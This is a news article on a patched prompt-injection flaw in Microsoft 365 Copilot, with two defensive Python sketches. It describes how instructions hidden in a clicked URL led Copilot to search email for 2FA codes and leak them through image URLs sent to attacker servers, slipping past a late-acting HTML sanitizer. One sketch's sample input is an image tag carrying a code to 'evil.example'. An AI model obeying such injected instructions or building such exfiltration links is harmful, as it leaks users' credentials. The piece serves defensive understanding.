Researchers Expose Critical Microsoft Copilot Vulnerability Bypassing Security to Steal 2FA Codes
Key Takeaways
- Microsoft Copilot had a critical vulnerability allowing attackers to exfiltrate 2FA codes and sensitive data from user emails via parameter injection attacks
- The vulnerability exploited a fundamental architectural weakness: LLMs cannot distinguish between user instructions and malicious commands embedded in external content
- Attackers bypassed multiple security layers by exploiting a timing gap in Copilot's HTML sanitization, triggering requests before guardrails could engage
Summary
Last Tuesday, Microsoft patched a critical vulnerability in its M365 Copilot AI platform that, according to the security researchers who discovered it, could be exploited to steal sensitive data, including two-factor authentication (2FA) codes, from user emails. The vulnerability stemmed from Copilot's inability to distinguish between legitimate user instructions and malicious commands injected into third-party content, a fundamental weakness shared across modern large language models. Researchers from Varonis developed an exploit chain called "Parameter-to-Prompt Injection" that leveraged Copilot's search functionality to exfiltrate data in a sequence of steps requiring no user action beyond clicking a link.
The exploit worked by crafting URLs with hidden instructions that, when clicked, prompted Copilot to search emails, extract sensitive information, and embed it in image URLs. When the browser rendered those images, it sent requests carrying the stolen data to attacker-controlled servers. Critically, the researchers discovered that Copilot's primary HTML sanitization guardrail (which wraps output in code blocks to prevent rendering) only activated after the response had already been streamed and partially rendered in the browser DOM. This timing gap allowed injected HTML to be rendered, and its image requests to fire, before protection could engage, leaving the safeguard ineffective.
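The timing gap described above can be illustrated with a minimal sketch of the opposite ordering: sanitize each streamed chunk before it is handed to the renderer, and hold back any HTML tag that is still incomplete. This is not Microsoft's fix, whose details the article does not describe. The allowlisted host, the `sanitize_stream` function, and the placeholder text are all hypothetical, and the sketch only handles HTML `<img>` tags, not Markdown images or other request-triggering elements.

```python
import html
import re
from typing import Iterable, Iterator
from urllib.parse import urlparse

# Hypothetical allowlist of hosts that images may be loaded from.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

IMG_TAG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def _neutralize(match: "re.Match[str]") -> str:
    """Keep an <img> tag only if its src host is allowlisted."""
    tag = match.group(0)
    src = SRC_ATTR.search(tag)
    host = urlparse(src.group(1)).hostname if src else None
    return tag if host in ALLOWED_IMAGE_HOSTS else "[image removed]"


def sanitize_stream(chunks: Iterable[str]) -> Iterator[str]:
    """Yield only sanitized text, so nothing reaches the renderer unchecked."""
    pending = ""
    for chunk in chunks:
        pending += chunk
        # A tag may be split across chunks: hold back everything from the
        # last "<" that has no closing ">" yet.
        cut = pending.rfind("<")
        if cut != -1 and ">" not in pending[cut:]:
            safe, pending = pending[:cut], pending[cut:]
        else:
            safe, pending = pending, ""
        if safe:
            yield IMG_TAG.sub(_neutralize, safe)
    if pending:
        # The stream ended mid-tag: emit the fragment as inert text.
        yield html.escape(pending)


if __name__ == "__main__":
    stream = ["Your code is ", '<img src="https://evil.example/x?', 'c=123456">', " done"]
    print("".join(sanitize_stream(stream)))
```

The design point is ordering rather than the specific filter: because the generator never yields an unchecked fragment, there is no window in which the browser can act on injected markup before the guardrail has seen it.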
The discovery illustrates a broader architectural problem with LLMs: they tend to comply with any instruction presented to them, regardless of whether it comes from a trusted user or is embedded in untrusted content. With no fundamental solution to what researchers call AI's "incurable gullibility," Microsoft and other LLM providers are forced to rely on ad hoc guardrails that determined attackers can circumvent. The vulnerability underscores that AI safety remains an unsolved problem, particularly in enterprise settings where these models access sensitive user data.
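As an illustration of the kind of ad hoc guardrail mentioned above, the following sketch records where a prompt came from and requires explicit confirmation before running one that arrived in a link. It is an assumption-laden example, not a description of how Copilot works: the query parameter name `q`, the `PendingPrompt` type, and the `assistant.example` host are hypothetical. It also does not address the underlying problem, since instructions embedded in emails or documents would still reach the model.

```python
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Hypothetical name of the query parameter that pre-fills the prompt.
PROMPT_PARAM = "q"


@dataclass(frozen=True)
class PendingPrompt:
    text: str
    source: str  # "typed" by the user, or "url" when carried in by a link

    @property
    def needs_confirmation(self) -> bool:
        # Only prompts the user typed themselves run without a confirmation step.
        return self.source != "typed"


def prompt_from_link(url: str) -> Optional[PendingPrompt]:
    """Extract a link-supplied prompt and tag it as untrusted."""
    values = parse_qs(urlparse(url).query).get(PROMPT_PARAM)
    if not values:
        return None
    return PendingPrompt(text=values[0], source="url")


if __name__ == "__main__":
    pending = prompt_from_link("https://assistant.example/chat?q=find%20my%20latest%20code")
    if pending is not None and pending.needs_confirmation:
        print(f"Run this prompt from a link? {pending.text!r}")
```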
The disclosure suggests that current guardrail approaches are insufficient: securing LLMs against instruction injection attacks requires architectural redesign, not just patching.
Editorial Opinion
This research demonstrates a critical and likely persistent weakness in LLM architecture. The fact that sophisticated AI systems can be tricked into exfiltrating sensitive data through simple exploits, while the security measures meant to stop them engage a moment too late, suggests that current guardrail approaches are fundamentally inadequate. Microsoft's patch addresses this specific attack, but the underlying weakness remains: enterprises deploying Copilot and similar tools should assume that data exfiltration will remain a risk until these systems are either fundamentally redesigned or strictly isolated from sensitive information.



